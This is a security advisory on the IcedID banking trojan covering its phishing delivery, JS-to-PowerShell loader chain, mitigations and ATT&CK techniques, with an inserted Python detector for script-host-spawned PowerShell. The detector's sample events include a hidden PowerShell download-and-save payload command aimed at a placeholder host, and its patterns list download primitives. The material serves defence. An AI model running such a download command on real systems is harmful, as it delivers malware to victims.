First noticed in 2017, IcedID is a banking trojan that steals financial information. IcedID has also been leveraged as a dropper for other malware and in the infection stage of ransomware operations.
This malware uses multiple delivery methods, of which phishing emails with macro-embedded attachments are the most prevalent. In a recent campaign involving IcedID, attackers abused the website contact forms of multiple enterprises to send emails laced with malicious links; clicking a link downloaded a malicious .zip file. These emails usually try to create a sense of urgency that provokes immediate action.
For instance, the sender pretends to be a photographer threatening legal action against the company for using his photos on their site without permission. The sender then shares a malicious link that purports to be evidence of the incident. On clicking the link, however, the recipient is taken to a Google page that downloads the malicious .zip file.
The phishing emails used in IcedID campaigns contain a malicious link that, when clicked, loads a Google page. This page requires the unsuspecting victim to sign in with their Google credentials, and upon sign-in a malicious .zip file is automatically downloaded to the victim’s machine. If the first link fails, the victim is redirected to a .top domain, which in turn leads to a Google User Content page that downloads the malicious .zip file.
Stages of execution:
- When the JS file is executed, it creates a Shell object
- The Shell object launches PowerShell, which downloads the IcedID payload as a .dat file
- The IcedID payload is encrypted to evade detection
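The execution chain above (script host creates a Shell object, PowerShell fetches a .dat payload) is visible in process-creation telemetry. The following Python detection sketch is an added example, not code from the original advisory: it runs over a handful of constructed, Sysmon Event ID 1-style process events (the hostnames, paths and URL are placeholders, not real IcedID infrastructure) and flags script-host-to-PowerShell spawns, raising severity when the command line contains a download primitive, a remote .dat URL, or an encoded command.

```python
"""
Detection sketch for the IcedID-style execution chain: a Windows script host
(wscript/cscript) launching PowerShell to download a payload.

The events below are constructed samples in a simplified Sysmon Event ID 1
shape (parent image, child image, command line); they are not real telemetry.
"""
import re
from dataclasses import dataclass

# Constructed sample events. The URL and paths are placeholders.
SAMPLE_EVENTS = [
    {"event_id": 1, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop (New-Object Net.WebClient)"
                     ".DownloadFile('http://example.invalid/update/main.dat',"
                     " $env:TEMP + '\\main.dat')"},
    {"event_id": 1, "parent_image": r"C:\Windows\explorer.exe",           # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"event_id": 1, "parent_image": r"C:\Windows\System32\cscript.exe",   # script host, but no PowerShell
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo hello"},
    {"event_id": 1, "parent_image": r"C:\Windows\System32\wscript.exe",   # hypothetical encoded command
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -enc SQBFAFgA..."},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Common PowerShell download primitives seen in loader one-liners.
DOWNLOAD_PATTERN = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|net\.webclient|start-bitstransfer", re.I)
# A remote URL ending in .dat, as in the payload described in the advisory.
DAT_URL = re.compile(r"https?://[^\s'\"]+\.dat\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENCODED = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)


@dataclass
class Finding:
    severity: str
    reason: str
    event: dict


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a Finding if the event is a script host spawning PowerShell, else None."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    if parent not in SCRIPT_HOSTS or child not in POWERSHELL:
        return None
    cmd = event["command_line"]
    reasons = ["script host spawned PowerShell"]
    severity = "medium"  # the parent/child pair alone is suspicious but not conclusive
    if DOWNLOAD_PATTERN.search(cmd):
        reasons.append("download primitive in command line")
        severity = "high"
    if DAT_URL.search(cmd):
        reasons.append("remote .dat payload URL")
        severity = "high"
    if ENCODED.search(cmd):
        reasons.append("encoded command")
        severity = "high"
    return Finding(severity, "; ".join(reasons), event)


def scan(events):
    """Run classify() over a list of events and keep the hits."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.reason}: {finding.event['command_line']}")
```

The parent/child pair is the durable signal; the command-line patterns only add confidence, since loaders rotate file extensions and obfuscate cmdlet names. In a SIEM the same logic maps directly onto a Sysmon or EDR process-creation query on ParentImage and Image.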
- IcedID is a banking trojan that steals the victim’s banking credentials and other financial information in the infected system and sends the information gathered to the attacker’s C2.
- IcedID also acts as a loader for other types of payloads like ransomware, furthering other forms of attacks.
- The banking trojan compromises the privacy of its victims and misuses their financial information.
- Infecting the system with ransomware will have an adverse impact on the business and its reputation.
- Raise awareness about phishing emails and malicious links.
- Use Multi-Factor Authentication for all accounts.
- Keep systems patched and up to date.
- Use up-to-date antivirus software.
Tactics, Techniques, and Procedures
| Tactic | Technique |
| --- | --- |
| Reconnaissance | Search Victim-Owned Websites (T1594) |
| Initial Access | Spearphishing Attachment (T1566.001) |
| Initial Access | Spearphishing Link (T1566.002) |
| Execution | Command and Scripting Interpreter (T1059) |
| Execution | Windows Management Instrumentation (T1047) |
| Credential Access | Credentials from Web Browsers (T1555.003) |
| Discovery | Domain Trust Discovery (T1482) |
| Discovery | Remote System Discovery (T1018) |
| Discovery | Security Software Discovery (T1518.001) |
| Discovery | System Information Discovery (T1082) |
| Discovery | System Network Configuration Discovery (T1016) |
| Lateral Movement | Remote Desktop Protocol (T1021.001) |
| Lateral Movement | SMB/Windows Admin Shares (T1021.002) |
| Collection | Man in the Browser (T1185) |
| Command and Control | Application Layer Protocol (T1071) |
| Exfiltration | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002) |
| Impact | Data Encrypted for Impact (T1486) |
Indicators of Compromise
File Hash – SHA1